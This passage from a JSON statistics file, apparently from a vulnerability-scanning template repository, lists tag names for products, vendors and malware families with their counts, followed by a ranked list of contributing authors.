1},{"name":"mediumish","count":1},{"name":"contact_form_7_captcha_project","count":1},{"name":"online_security_guards_hiring_system_project","count":1},{"name":"aflam","count":1},{"name":"gabia","count":1},{"name":"hec","count":1},{"name":"socomec","count":1},{"name":"b-elektro","count":1},{"name":"polywork","count":1},{"name":"vite","count":1},{"name":"namedprocess","count":1},{"name":"uiuxdevsocial-mastodon-instance","count":1},{"name":"codecabin","count":1},{"name":"flock","count":1},{"name":"averta","count":1},{"name":"sentinelone","count":1},{"name":"streamlabs","count":1},{"name":"aaha-chat","count":1},{"name":"distccd","count":1},{"name":"infographic-and-list-builder-ilist","count":1},{"name":"line","count":1},{"name":"microfinance_management_system_project","count":1},{"name":"BankOfAmerica","count":1},{"name":"collectd","count":1},{"name":"woo-order-export-lite","count":1},{"name":"2kblater","count":1},{"name":"couchcms","count":1},{"name":"external-media-without-import","count":1},{"name":"genieaccess","count":1},{"name":"gargoyle","count":1},{"name":"payroll","count":1},{"name":"readtomyshoe","count":1},{"name":"kerbynet","count":1},{"name":"easyscripts","count":1},{"name":"issabel","count":1},{"name":"my-instants","count":1},{"name":"asyncrat","count":1},{"name":"cpulimit","count":1},{"name":"gridx","count":1},{"name":"home-assistant","count":1},{"name":"phpbb","count":1},{"name":"tradingview","count":1},{"name":"quip","count":1},{"name":"vm-disk-encryption","count":1},{"name":"msmtp","count":1},{"name":"photoprism","count":1},{"name":"memberhero","count":1},{"name":"viper","count":1},{"name":"shield-security","count":1},{"name":"target","count":1},{"name":"dixell","count":1},{"name":"bluecoat","count":1},{"name":"theme-fusion","count":1},{"name":"king-theme","count":1},{"name":"security-center","count":1},{"name":"ligeo","count":1},{"name":"xmlswf","count":1},{"name":"wavemaker","count":1},{"name":"jasperserver","count":1},{"name":"mspcontrol","count":1},{"name":"msmswitch","count":1},{"name":"argocd","count":1},{"name":"mystic-stealer","count":1},{"name":"ejbca","count":1},{"name":"zip_attachments_project","count":1},{"name":"opennebula","count":1},{"name":"caa","count":1},{"name":"isg","count":1},{"name":"codeberg","count":1},{"name":"harman","count":1},{"name":"automation","count":1},{"name":"darkstat","count":1},{"name":"amp","count":1},{"name":"statistics","count":1},{"name":"brave","count":1},{"name":"21buttons","count":1},{"name":"zatrybipl","count":1},{"name":"helprace","count":1},{"name":"sponip","count":1},{"name":"smi","count":1},{"name":"unleash","count":1},{"name":"ulterius","count":1},{"name":"palletsprojects","count":1},{"name":"sco","count":1},{"name":"workreap","count":1},{"name":"opencast","count":1},{"name":"codecademy","count":1},{"name":"f3","count":1},{"name":"slideshare","count":1},{"name":"permissions","count":1},{"name":"super-socializer","count":1},{"name":"templatecookie","count":1},{"name":"satellite","count":1},{"name":"forticlient","count":1},{"name":"fuxa","count":1},{"name":"lastfm-rotation","count":1},{"name":"loganalyzer","count":1},{"name":"gyra","count":1},{"name":"revmakx","count":1},{"name":"muck-rack","count":1},{"name":"pihole","count":1},{"name":"rsshub","count":1},{"name":"clearbit","count":1},{"name":"huijietong","count":1},{"name":"palnet","count":1},{"name":"seaduke","count":1},{"name":"omniampx","count":1},{"name":"vertaai","count":1},{"name":"u5cms","count":1},{"name":"smart-manager-for-wp-e-commerce","count":1},{"name":"ipdata","count":1},{"name":"element","count":1},{"name":"oneblog","count":1},{"name":"contactform","count":1},{"name":"stem","count":1},{"name":"floc","count":1},{"name":"openpagerank","count":1},{"name":"plainviewplugins","count":1},{"name":"mws","count":1},{"name":"ncomputing","count":1},{"name":"fms","count":1},{"name":"iws-geo-form-fields_project","count":1},{"name":"erp","count":1},{"name":"dotclear","count":1},{"name":"Microsoft","count":1},{"name":"coinlayer","count":1},{"name":"modx","count":1},{"name":"bws-xss","count":1},{"name":"ltrace","count":1},{"name":"defi","count":1},{"name":"dockge","count":1},{"name":"liberty","count":1},{"name":"popl","count":1},{"name":"pewex","count":1},{"name":"mkdocs","count":1},{"name":"maillist","count":1},{"name":"parler","count":1},{"name":"recrystallize","count":1},{"name":"powershell-universal","count":1},{"name":"ifunny","count":1},{"name":"ares","count":1},{"name":"zarafa","count":1},{"name":"xintianqing","count":1},{"name":"castingcallclub","count":1},{"name":"dojoverse","count":1},{"name":"sassy","count":1},{"name":"strider","count":1},{"name":"rudloff","count":1},{"name":"fontsy","count":1},{"name":"maga-chat","count":1},{"name":"ulanzi","count":1},{"name":"flipboard","count":1},{"name":"hackaday","count":1},{"name":"trackmanialadder","count":1},{"name":"goodlayerslms","count":1},{"name":"gamespot","count":1},{"name":"blind-ssrf","count":1},{"name":"slant","count":1},{"name":"security-solutions","count":1},{"name":"wpforo","count":1},{"name":"squidex","count":1},{"name":"unity","count":1},{"name":"hertzbeat","count":1},{"name":"calendly","count":1},{"name":"gryphonconnect","count":1},{"name":"ericssonlg","count":1},{"name":"davantis","count":1},{"name":"analyzer","count":1},{"name":"oneidentity","count":1},{"name":"livemasterru","count":1},{"name":"mirasys","count":1},{"name":"Forgejo","count":1},{"name":"meet-me","count":1},{"name":"castel","count":1},{"name":"bws-zendesk","count":1},{"name":"iframe","count":1},{"name":"stopbadbots","count":1},{"name":"unyson","count":1},{"name":"semaphore","count":1},{"name":"daybydaycrm","count":1},{"name":"forumprawneorg","count":1},{"name":"torsocks","count":1},{"name":"mt","count":1},{"name":"jreport","count":1},{"name":"microsoft-teams","count":1},{"name":"mastodon-tflnetpl","count":1},{"name":"okiko","count":1},{"name":"livebos","count":1},{"name":"hortonworks","count":1},{"name":"ez","count":1},{"name":"tailon","count":1},{"name":"exposures","count":1},{"name":"clusterdafrica","count":1},{"name":"scraperbox","count":1},{"name":"jeewms","count":1},{"name":"diigo","count":1},{"name":"vtiger","count":1},{"name":"repeater","count":1},{"name":"tiempo","count":1},{"name":"protractor","count":1},{"name":"rakefile","count":1},{"name":"smelsy","count":1},{"name":"venmo","count":1},{"name":"amdoren","count":1},{"name":"travis","count":1},{"name":"pnpm","count":1},{"name":"wowthemes","count":1},{"name":"cults3d","count":1},{"name":"fluig","count":1},{"name":"zeta-producer","count":1},{"name":"codeception","count":1},{"name":"contest-gallery","count":1},{"name":"podlove","count":1},{"name":"memos","count":1},{"name":"lobechat","count":1},{"name":"nweb2fax","count":1},{"name":"anti-malware_security_and_brute-force_firewall_project","count":1},{"name":"budget","count":1},{"name":"novus","count":1},{"name":"crevado","count":1},{"name":"wpmudev","count":1},{"name":"the-plus-addons-for-elementor","count":1},{"name":"traccar","count":1},{"name":"gravatar","count":1},{"name":"pulmi","count":1},{"name":"qwiz-online-quizzes-and-flashcards","count":1},{"name":"new-year-firework_project","count":1},{"name":"bologer","count":1},{"name":"ubigeo_de_peru_para_woocommerce_project","count":1},{"name":"nsicg","count":1},{"name":"independent-academia","count":1},{"name":"wishpond","count":1},{"name":"expect","count":1},{"name":"sceditor","count":1},{"name":"getperfectsurvey","count":1},{"name":"nootheme","count":1},{"name":"pfblockerng","count":1},{"name":"centreon","count":1},{"name":"hiring","count":1},{"name":"nvrmini","count":1},{"name":"import_legacy_media_project","count":1},{"name":"toko","count":1},{"name":"tufin","count":1},{"name":"uefconnect","count":1},{"name":"ssltls","count":1},{"name":"chaos","count":1},{"name":"codologic","count":1},{"name":"all-in-one-video-gallery","count":1},{"name":"htmlcoderhelper","count":1},{"name":"tpshop","count":1},{"name":"diagnostic","count":1},{"name":"personal-dictionary","count":1},{"name":"m-files","count":1},{"name":"ip2whois","count":1},{"name":"captcha","count":1},{"name":"sentimente","count":1},{"name":"titool","count":1},{"name":"ilo4","count":1},{"name":"ait-csv","count":1},{"name":"raiden","count":1},{"name":"lokomedia","count":1},{"name":"psalm","count":1},{"name":"x-ray","count":1},{"name":"ko-fi","count":1},{"name":"distance","count":1},{"name":"jqueryfiletree_project","count":1},{"name":"vero","count":1},{"name":"sky","count":1},{"name":"pyramid","count":1},{"name":"knowage","count":1},{"name":"wps-hide-login","count":1},{"name":"proxmox","count":1},{"name":"tuxedo","count":1},{"name":"dradis","count":1},{"name":"debounce","count":1},{"name":"hirak","count":1},{"name":"speakout","count":1},{"name":"badgeos","count":1},{"name":"majordomo2","count":1},{"name":"photoblocks","count":1},{"name":"panmicro","count":1},{"name":"wagtail","count":1},{"name":"clockwatch","count":1},{"name":"moduweb","count":1},{"name":"ajaydsouza","count":1},{"name":"electrolink","count":1},{"name":"avast","count":1},{"name":"fontawesome","count":1},{"name":"360","count":1},{"name":"wp-limit-failed-login-attempts","count":1},{"name":"endpoint-protector","count":1},{"name":"maianscriptworld","count":1},{"name":"awesomemotive","count":1},{"name":"sshpass","count":1},{"name":"office365","count":1},{"name":"kavitareader","count":1},{"name":"traggo","count":1},{"name":"dmarc","count":1},{"name":"airee","count":1},{"name":"dxplanning","count":1},{"name":"fastpanel","count":1},{"name":"safenet","count":1},{"name":"medium","count":1},{"name":"wisegiga","count":1},{"name":"emobile","count":1},{"name":"privx","count":1},{"name":"azon","count":1},{"name":"edgemax","count":1},{"name":"threatq","count":1},{"name":"flexbe","count":1},{"name":"a3rev","count":1},{"name":"next-terminal","count":1},{"name":"shopizer","count":1},{"name":"niagara","count":1},{"name":"zrypt","count":1},{"name":"loadbalancer","count":1},{"name":"chaty","count":1},{"name":"isg1000","count":1},{"name":"tf2-backpack-examiner","count":1},{"name":"hc_custom_wp-admin_url_project","count":1},{"name":"ways-ac","count":1},{"name":"truth-social","count":1},{"name":"redcap","count":1},{"name":"smh","count":1},{"name":"solarlog","count":1},{"name":"jobsearch","count":1},{"name":"sgp","count":1},{"name":"eureka","count":1},{"name":"climatejusticerocks-mastodon-instance","count":1},{"name":"idangero","count":1},{"name":"oxid","count":1},{"name":"pondol-formmail_project","count":1},{"name":"eventespresso","count":1},{"name":"prime-mover","count":1},{"name":"cx","count":1},{"name":"screenshotapi","count":1},{"name":"expn","count":1},{"name":"view","count":1},{"name":"dss","count":1},{"name":"todoist","count":1},{"name":"justwriting","count":1},{"name":"simple_client_management_system_project","count":1},{"name":"modeldb","count":1},{"name":"webcomco","count":1},{"name":"officekeeper","count":1},{"name":"flyway","count":1},{"name":"macc2","count":1},{"name":"nodered","count":1},{"name":"serv-u","count":1},{"name":"shellinabox_project","count":1},{"name":"siteguard","count":1},{"name":"pmm","count":1},{"name":"olivetti","count":1},{"name":"shindig","count":1},{"name":"dwbooster","count":1},{"name":"localai","count":1},{"name":"seafile","count":1},{"name":"xvr","count":1},{"name":"mastodon-countersocial","count":1},{"name":"clustering_project","count":1},{"name":"phabricator","count":1},{"name":"satis","count":1},{"name":"blogipl","count":1},{"name":"npmjs","count":1},{"name":"url-analyse","count":1},{"name":"roxy-wi","count":1},{"name":"majordomo","count":1},{"name":"documentlocator","count":1},{"name":"content-central","count":1},{"name":"usememos","count":1},{"name":"phacility","count":1},{"name":"sphinxonline","count":1},{"name":"land-software","count":1},{"name":"raspberry","count":1},{"name":"minimouse","count":1},{"name":"addpac","count":1},{"name":"cse","count":1},{"name":"feedwordpress_project","count":1},{"name":"pexec","count":1},{"name":"mystrom","count":1},{"name":"mikoviny","count":1},{"name":"zenario","count":1},{"name":"weheartit","count":1},{"name":"costa","count":1},{"name":"pinata","count":1},{"name":"coverity","count":1},{"name":"jorani_project","count":1},{"name":"realtyna","count":1},{"name":"rudderstack","count":1},{"name":"ecom","count":1},{"name":"purestorage","count":1},{"name":"spidercontrol","count":1},{"name":"houzz","count":1},{"name":"dwsync","count":1},{"name":"formalms","count":1},{"name":"license","count":1},{"name":"cracked-io","count":1},{"name":"joombri","count":1},{"name":"rc","count":1},{"name":"page-builder-add","count":1},{"name":"cambium","count":1},{"name":"onyphe","count":1},{"name":"www-xml-sitemap-generator-org","count":1},{"name":"quilium","count":1},{"name":"sugar","count":1},{"name":"graphicssocial-mastodon-instance","count":1},{"name":"opensource","count":1},{"name":"alchemy","count":1},{"name":"huiwen","count":1},{"name":"basicrat","count":1},{"name":"instagram-php-api_project","count":1},{"name":"wftpserver","count":1},{"name":"instructure","count":1},{"name":"mycloud","count":1},{"name":"tensorboard","count":1},{"name":"cors","count":1},{"name":"garage_management_system_project","count":1},{"name":"dwr","count":1},{"name":"curiouscat","count":1},{"name":"wp-video-gallery-free","count":1},{"name":"g5theme","count":1},{"name":"postcrossing","count":1},{"name":"rubedo_project","count":1},{"name":"nimble","count":1},{"name":"phpwiki","count":1},{"name":"mapproxy","count":1},{"name":"gravitl","count":1},{"name":"cube105","count":1},{"name":"bittube","count":1},{"name":"zero-spam","count":1},{"name":"endpoint","count":1},{"name":"satellian","count":1},{"name":"radarr","count":1},{"name":"intellect","count":1},{"name":"disqus","count":1},{"name":"krweb","count":1},{"name":"attenzione","count":1},{"name":"mapmytracks","count":1},{"name":"icegram","count":1},{"name":"whois","count":1},{"name":"easync-booking","count":1},{"name":"niteothemes","count":1},{"name":"pluginops","count":1},{"name":"foursquare","count":1},{"name":"mastodon-mastodon","count":1},{"name":"ruoyi","count":1},{"name":"eap","count":1},{"name":"cars-seller-auto-classifieds-script_project","count":1},{"name":"dynamodb","count":1},{"name":"discusssocial-mastodon-instance","count":1},{"name":"aspect","count":1},{"name":"hyperic","count":1},{"name":"webdav","count":1},{"name":"artbreeder","count":1},{"name":"livegbs","count":1},{"name":"themeinprogress","count":1},{"name":"jackett","count":1},{"name":"wildneutron","count":1},{"name":"mobotix","count":1},{"name":"phpunit","count":1},{"name":"oecms_project","count":1},{"name":"orcusrat","count":1},{"name":"adlisting","count":1},{"name":"leaguemanager","count":1},{"name":"search-engine","count":1},{"name":"stdbuf","count":1},{"name":"pelco","count":1},{"name":"speakout-email-petitions","count":1},{"name":" microsoft","count":1},{"name":"contact-form-entries","count":1},{"name":"wpsmartcontracts","count":1},{"name":"filemage","count":1},{"name":"festivo","count":1},{"name":"sensiolabs","count":1},{"name":"jpcert","count":1},{"name":"html2wp","count":1},{"name":"yazawaj","count":1},{"name":"contactossex","count":1},{"name":"femtocell","count":1},{"name":"ksoa","count":1},{"name":"konghq","count":1},{"name":"code-garage","count":1},{"name":"age-verification","count":1},{"name":"artists-clients","count":1},{"name":"biolink","count":1},{"name":"musiciansocial-mastodon-instance","count":1},{"name":"newmeet","count":1},{"name":"visnesscard","count":1},{"name":"linx","count":1},{"name":"webnms","count":1},{"name":"helpdesk_pro_project","count":1},{"name":"dolphin","count":1},{"name":"reality","count":1},{"name":"newcapec","count":1},{"name":"smule","count":1},{"name":"delta","count":1},{"name":"log-profile","count":1},{"name":"catchplugins","count":1},{"name":"cerber","count":1},{"name":"codebase","count":1},{"name":"proofpoint","count":1},{"name":"jgraph","count":1},{"name":"7dach","count":1},{"name":"seber","count":1},{"name":"coinranking","count":1},{"name":"jeecg_p3_biz_chat_project","count":1},{"name":"janguo","count":1},{"name":"webcraftic","count":1},{"name":"yeswehack","count":1},{"name":"redbubble","count":1},{"name":"tor","count":1},{"name":"authelia","count":1},{"name":"jellyseerr","count":1},{"name":"easy_student_results_project","count":1},{"name":"7cup","count":1},{"name":"powercreator","count":1},{"name":"siterecovery","count":1},{"name":"dotnetblogengine","count":1},{"name":"bws-custom-search","count":1},{"name":"webasyst","count":1},{"name":"collect_and_deliver_interface_for_woocommerce_project","count":1},{"name":"sphinx","count":1},{"name":"omni","count":1},{"name":"roads","count":1},{"name":"eurotel","count":1},{"name":"uncanny-learndash-toolkit","count":1},{"name":"abuseipdb","count":1},{"name":"yunanbao","count":1},{"name":"nevma","count":1},{"name":"trueranker","count":1},{"name":"squadcast","count":1},{"name":"jk","count":1},{"name":"pypicloud","count":1},{"name":"shortcode","count":1},{"name":"php-proxy","count":1},{"name":"fortimanager","count":1},{"name":"oki","count":1},{"name":"protocol","count":1},{"name":"comfortel","count":1},{"name":"wp-upg","count":1},{"name":"insight","count":1},{"name":"currencylayer","count":1},{"name":"sprintful","count":1},{"name":"misconfiguration","count":1},{"name":"buildkite","count":1},{"name":"fatsecret","count":1},{"name":"authorstream","count":1},{"name":"naija-planet","count":1},{"name":"wpmanageninja","count":1},{"name":"trading212","count":1},{"name":"tracker","count":1},{"name":"narnoo-distributor","count":1},{"name":"vmstio-mastodon-instance","count":1},{"name":"foliovision","count":1},{"name":"revive-sas","count":1},{"name":"dogtagpki","count":1},{"name":"access-control","count":1},{"name":"xz","count":1},{"name":"tryhackme","count":1},{"name":"dplus","count":1},{"name":"phalcon","count":1},{"name":"policy-assignment","count":1},{"name":"jooforge","count":1},{"name":"optergy","count":1},{"name":"red-gate","count":1},{"name":"locust","count":1},{"name":"mix","count":1},{"name":"chillcreations","count":1},{"name":"skywalking","count":1},{"name":"wifi","count":1},{"name":"wp-ban","count":1},{"name":"jotform","count":1},{"name":"sourcemaps","count":1},{"name":"cybelsoft","count":1},{"name":"titan-framework","count":1},{"name":"voidtools","count":1},{"name":"citybook","count":1},{"name":"tarantella","count":1},{"name":"wrteam","count":1},{"name":"watershed","count":1},{"name":"webcenter","count":1},{"name":"revoked","count":1},{"name":"tootingch-mastodon-instance","count":1},{"name":"cd-action","count":1},{"name":"blackbox","count":1},{"name":"webgrind_project","count":1},{"name":"mylittlebackup","count":1},{"name":"mastodon-climatejusticerocks","count":1},{"name":"clickdesk","count":1},{"name":"enscript","count":1},{"name":"siteminder","count":1},{"name":"aquatronica","count":1},{"name":"spx-php","count":1},{"name":"systemmanager","count":1},{"name":"flowcode","count":1},{"name":"gtranslate","count":1},{"name":"vfs","count":1},{"name":"outsystems","count":1},{"name":"quitterpl","count":1},{"name":"autonomy","count":1},{"name":"timely","count":1},{"name":"luracast","count":1},{"name":"klog","count":1},{"name":"webeditors","count":1},{"name":"buttercms","count":1},{"name":"dukapress","count":1},{"name":"termtalk","count":1},{"name":"pokerstrategy","count":1},{"name":"likebtn-like-button_project","count":1},{"name":"tiny_java_web_server_project","count":1},{"name":"buildbot","count":1},{"name":"deadbolt","count":1}],"authors":[{"name":"dhiyaneshdk","count":1397},{"name":"daffainfo","count":866},{"name":"dwisiswant0","count":802},{"name":"princechaddha","count":497},{"name":"pussycat0x","count":451},{"name":"ritikchaddha","count":445},{"name":"pikpikcu","count":353},{"name":"pdteam","count":302},{"name":"ricardomaia","count":243},{"name":"geeknik","count":231},{"name":"theamanrawat","count":214},{"name":"r3y3r53","count":199},{"name":"0x_akoko","count":179},{"name":"righettod","count":179},{"name":"gy741","count":168},{"name":"rxerium","count":160},{"name":"sleepingbag945","count":132},{"name":"pdresearch","count":128},{"name":"arafatansari","count":118},{"name":"iamnoooob","count":114},{"name":"tess","count":109},{"name":"rootxharsh","count":103},{"name":"idealphase","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"securityforeveryone","count":52},{"name":"philippedelteil","count":52},{"name":"johnk3r","count":47},{"name":"gaurang","count":42},{"name":"edoardottt","count":40},{"name":"s4e-io","count":36},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":34},{"name":"mastercho","count":32},{"name":"luisfelipe146","count":31},{"name":"adam crosser","count":31},{"name":"ice3man","count":29},{"name":"pwnhxl","count":28},{"name":"ctflearner","count":27},{"name":"hardik-solanki","count":24},{"name":"parthmalhotra","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"harsh","count":23},{"name":"userdehghani","count":23},{"name":"ffffffff0x","count":22},{"name":"kazgangap","count":20},{"name":"sullo","count":19},{"name":"cckuailong","count":18},{"name":"bhutch","count":17},{"name":"0xpugal","count":17},{"name":"lu4nx","count":17},{"name":"shaikhyaser","count":16},{"name":"random-robbie","count":16},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"co5mos","count":14},{"name":"kazet","count":14},{"name":"dogasantos","count":14},{"name":"r3dg33k","count":14},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":13},{"name":"sharath","count":13},{"name":"elsfa7110","count":13},{"name":"theabhinavgaur","count":13},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"icarot","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"0x240x23elu","count":10},{"name":"alph4byt3","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"emadshanab","count":9},{"name":"fabaff","count":9},{"name":"olearycrew","count":9},{"name":"initstring","count":9},{"name":"momika233","count":9},{"name":"oppsec","count":9},{"name":"adamcrosser","count":9},{"name":"_0xf4n9x_","count":8},{"name":"noraj","count":8},{"name":"iamthefrogy","count":8},{"name":"nodauf","count":8},{"name":"veshraj","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"irshad ahamed","count":8},{"name":"kophjager007","count":7},{"name":"tarunkoyalwar","count":7},{"name":"techryptic (@tech)","count":7},{"name":"amirhossein raeisi","count":7},{"name":"caspergn","count":7},{"name":"harshbothra_","count":7},{"name":"hahwul","count":7},{"name":"leovalcante","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"its0x08","count":7},{"name":"projectdiscoveryai","count":7},{"name":"huta0","count":7},{"name":"amit-jd","count":7},{"name":"dr_set","count":7},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"megamansec","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"r3naissance","count":6},{"name":"justaacat","count":6},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":6},{"name":"lucky0x0d","count":6},{"name":"xelkomy","count":6},{"name":"devang-solanki","count":6},{"name":"pathtaga","count":6},{"name":"gitlab red team","count":6},{"name":"ice3man543","count":6},{"name":"clem9669","count":6},{"name":"ja1sh","count":6},{"name":"byt3bl33d3r","count":6},{"name":"evan rubinstein","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"imnightmaree","count":6},{"name":"robotshell","count":6},{"name":"nvn1729","count":6},{"name":"powerexploit","count":5},{"name":"panch0r3d","count":5},{"name":"iamnooob","count":5},{"name":"mr-xn","count":5},{"name":"defr0ggy","count":5},{"name":"podalirius","count":5},{"name":"arm!tage","count":5},{"name":"adeljck","count":5},{"name":"isacaya","count":5},{"name":"ganofins","count":5},{"name":"s0obi","count":5},{"name":"farish","count":5},{"name":"r12w4n","count":5},{"name":"gtrrnr","count":5},{"name":"kh4sh3i","count":5},{"name":"yanyun","count":5},{"name":"pulsesecurity.co.nz","count":5},{"name":"andreluna","count":5},{"name":"shine","count":5},{"name":"king-alexander","count":5},{"name":"your3cho","count":5},{"name":"vicrack","count":5},{"name":"prajiteshsingh","count":5},{"name":"xxcdd","count":4},{"name":"cookiehanhoan","count":4},{"name":"ggranjus","count":4},{"name":"shankar acharya","count":4},{"name":"omranisecurity","count":4},{"name":"dolev farhi","count":4},{"name":"cheesymoon","count":4},{"name":"nybble04","count":4},{"name":"m4lwhere","count":4},{"name":"e_schultze_","count":4},{"name":"scent2d","count":4},{"name":"jpg0mez","count":4},{"name":"h1ei1","count":4},{"name":"wisnupramoedya","count":4},{"name":"0xr2r","count":4},{"name":"dadevel","count":4},{"name":"tanq16","count":4},{"name":"flx","count":4},{"name":"incogbyte","count":4},{"name":"heeress","count":4},{"name":"k0pak4","count":4},{"name":"3th1c_yuk1","count":4},{"name":"joanbono","count":4},{"name":"lum8rjack","count":4},{"name":"impramodsargar","count":3},{"name":"dr0pd34d","count":3},{"name":"fxploit","count":3},{"name":"unstabl3","count":3},{"name":"huowuzhao","count":3},{"name":"0xkayala","count":3},{"name":"arliya","count":3},{"name":"vagnerd","count":3},{"name":"shifacyclewala","count":3},{"name":"johnjhacking","count":3},{"name":"soonghee2","count":3},{"name":"dudez","count":3},{"name":"imjust0","count":3},{"name":"randomrobbie","count":3},{"name":"alifathi-h1","count":3},{"name":"ambassify","count":3},{"name":"davidmckennirey","count":3},{"name":"taielab","count":3},{"name":"0w4ys","count":3},{"name":"e1a","count":3},{"name":"coldfish","count":3},{"name":"matt galligan","count":3},{"name":"splint3r7","count":3},{"name":"f1tz","count":3},{"name":"j3ssie","count":3},{"name":"andydoering","count":3},{"name":"ph33r","count":3},{"name":"lark-lab","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"ekrause","count":3},{"name":"lucasljm2001","count":3},{"name":"xianke","count":3},{"name":"evergreencartoons","count":3},{"name":"me9187","count":3},{"name":"aringo","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"true13","count":3},{"name":"_generic_human_","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"eeche","count":3},{"name":"swissky","count":3},{"name":"charles d","count":3},{"name":"chae1xx1os","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"whoever","count":3},{"name":"atomiczsec","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"persona-twotwo","count":3},{"name":"parth","count":3},{"name":"thabisocn","count":3},{"name":"skeltavik","count":3},{"name":"badboycxcc","count":3},{"name":"jarijaas","count":3},{"name":"arcc","count":3},{"name":"c4sper0","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mailler","count":3},{"name":"bernardofsr","count":3},{"name":"salts","count":3},{"name":"z3bd","count":3},{"name":"canberbamber","count":3},{"name":"joeldeleep","count":2},{"name":"egemenkochisarli","count":2},{"name":"dbrwsky","count":2},{"name":"8arthur","count":2},{"name":"maximus decimus","count":2},{"name":"paradessia","count":2},{"name":"parzival","count":2},{"name":"gevakun","count":2},{"name":"clarkvoss","count":2},{"name":"foulenzer","count":2},{"name":"supr4s","count":2},{"name":"lstatro","count":2},{"name":"0xrudra","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"w4cky_","count":2},{"name":"topscoder","count":2},{"name":"sy3omda","count":2},{"name":"herry","count":2},{"name":"s4eio","count":2},{"name":"bananabr","count":2},{"name":"h0j3n","count":2},{"name":"0xelkomy","count":2},{"name":"pbuff07","count":2},{"name":"vavkamil","count":2},{"name":"thezakman","count":2},{"name":"convisoappsec","count":2},{"name":"gal nagli","count":2},{"name":"paperpen","count":2},{"name":"dogancanbakir","count":2},{"name":"thefoggiest","count":2},{"name":"github.com/its0x08","count":2},{"name":"z0ne","count":2},{"name":"codexlynx","count":2},{"name":"wa1tf0rme","count":2},{"name":"x1m_martijn","count":2},{"name":"bl4ckp4r4d1s3","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"christianpoeschl","count":2},{"name":"v0idc0de","count":2},{"name":"hetroublemakr","count":2},{"name":"florianmaak","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"zy9ard3","count":2},{"name":"0xsapra","count":2},{"name":"supras","count":2},{"name":"0xsmiley","count":2},{"name":"notnotnotveg","count":2},{"name":"davidegirardi","count":2},{"name":"raesene","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"sascha brendel","count":2},{"name":"bp0lr","count":2},{"name":"msegoviag","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"luci","count":2},{"name":"thevillagehacker","count":2},{"name":"geekby","count":2},{"name":"sinkettu","count":2},{"name":"c3l3si4n","count":2},{"name":"manas_harsh","count":2},{"name":"bmcel","count":2},{"name":"korteke","count":2},{"name":"mzack9999","count":2},{"name":"redteambrasil","count":2},{"name":"joshlarsen","count":2},{"name":"pxmme1337","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"kre80r","count":2},{"name":"martincodes-de","count":2},{"name":"usdag","count":2},{"name":"bing0o","count":2},{"name":"sinsinology","count":2},{"name":"afaq","count":2},{"name":"dahse89","count":2},{"name":"bsysop","count":2},{"name":"randomdhiraj","count":2},{"name":"danielmofer","count":2},{"name":"brenocss","count":2},{"name":"nuk3s3c","count":2},{"name":"mrharshvardhan","count":2},{"name":"y4er","count":2},{"name":"d4vy","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"joshua rogers","count":2},{"name":"charles d.","count":2},{"name":"danmcinerney","count":2},{"name":"0xcrypto","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"thardt-praetorian","count":2},{"name":"n-thumann","count":2},{"name":"socketz","count":2},{"name":"uomogrande","count":2},{"name":"streetofhackerr007","count":2},{"name":"sbani","count":2},{"name":"alessandro albani - devisions","count":2},{"name":"cocxanh","count":2},{"name":"t3l3machus","count":2},{"name":"ayadim","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"6mile","count":2},{"name":"liwermor","count":2},{"name":"k11h-de","count":2},{"name":"666asd","count":2},{"name":"cckuakilong","count":2},{"name":"serrapa","count":2},{"name":"rafaelwdornelas","count":2},{"name":"ritesh_gohil(#l4stpl4y3r)","count":2},{"name":"shankaracharya","count":2},{"name":"moritz nentwig","count":2},{"name":"ep1csage","count":2},{"name":"shelled","count":2},{"name":"kishore-hariram","count":2},{"name":"ajaysenr","count":2},{"name":"0xnirvana","count":2},{"name":"ehsahil","count":2},{"name":"hackerarpan","count":2},{"name":"myztique","count":2},{"name":"ree4pwn","count":2},{"name":"brucelsone","count":2},{"name":"g4l1t0","count":2},{"name":"hanlaomo","count":1},{"name":"_harleo","count":1},{"name":"_darrenmartyn","count":1},{"name":"schniggie","count":1},{"name":"y0no","count":1},{"name":"kailashbohara","count":1},{"name":"tea","count":1},{"name":"0xcharan","count":1},{"name":"skylark-lab","count":1},{"name":"hczdmr","count":1},{"name":"adilsoybali","count":1},{"name":"d0rkerdevil","count":1},{"name":"8authur","count":1},{"name":"evolutionsec","count":1},{"name":"byobin","count":1},{"name":"rumble773","count":1},{"name":"mhdsamx","count":1},{"name":"toufik-airane","count":1},{"name":"noah @thesubtlety","count":1},{"name":"sid ahmed malaoui @ realistic 